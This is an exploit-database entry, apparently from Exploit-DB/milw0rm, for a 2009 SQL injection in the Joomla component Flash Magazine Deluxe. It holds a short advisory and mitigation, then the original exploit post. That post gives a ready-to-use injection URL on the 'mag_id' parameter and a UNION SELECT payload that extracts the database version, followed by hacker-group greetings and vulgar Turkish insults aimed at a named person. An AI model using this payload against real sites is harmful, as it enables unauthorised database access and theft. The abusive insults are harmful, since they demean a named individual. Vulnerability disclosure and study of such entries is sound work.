header-logo
Suggest Exploit
vendor:
Flash Magazine Deluxe
by:
TurkGuvenligi
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Flash Magazine Deluxe
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component Flash Magazine Deluxe Remote Sql Injection

A vulnerability in Joomla Component Flash Magazine Deluxe allows an attacker to inject malicious SQL commands into the application. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mag_id' parameter of the 'index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the context of the application. This can allow the attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and compromise the underlying system.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

www.turkguvenligi.info / Author : TurkGuvenligi / Mail : admin@turkguvenligi.info

t4cs1zkr4L - Agd_scorp - TheHacker - Fatih - SuSkuN - Zec - DreamTurk - Mr.SheYtaN - Ghost61 - BLaSteR - Desquner

Very Very Thanks : TurkguvenLigi Members - Terrorist Crew

Joomla Component Flash Magazine Deluxe Remote Sql Injection

http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL

companent down bro : http://www.elearningforce.biz/flash-magazine-deluxe/flash-magazine-deluxe-description.html

SQL : union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

Are you ready ? , isko s2mi 7.

Hop hop isko top isko , hop hop isko göt isko...

Note : İsko[bknz:öküz]'un makinemize çektigi agır ddos tan doLayı server yeniLeniyor...

çok yakında [TG] online...İsko artık sende kabahat buLmuyom seni o mahaLLede barındıran

muhtarın a.Q...

# milw0rm.com [2009-01-26]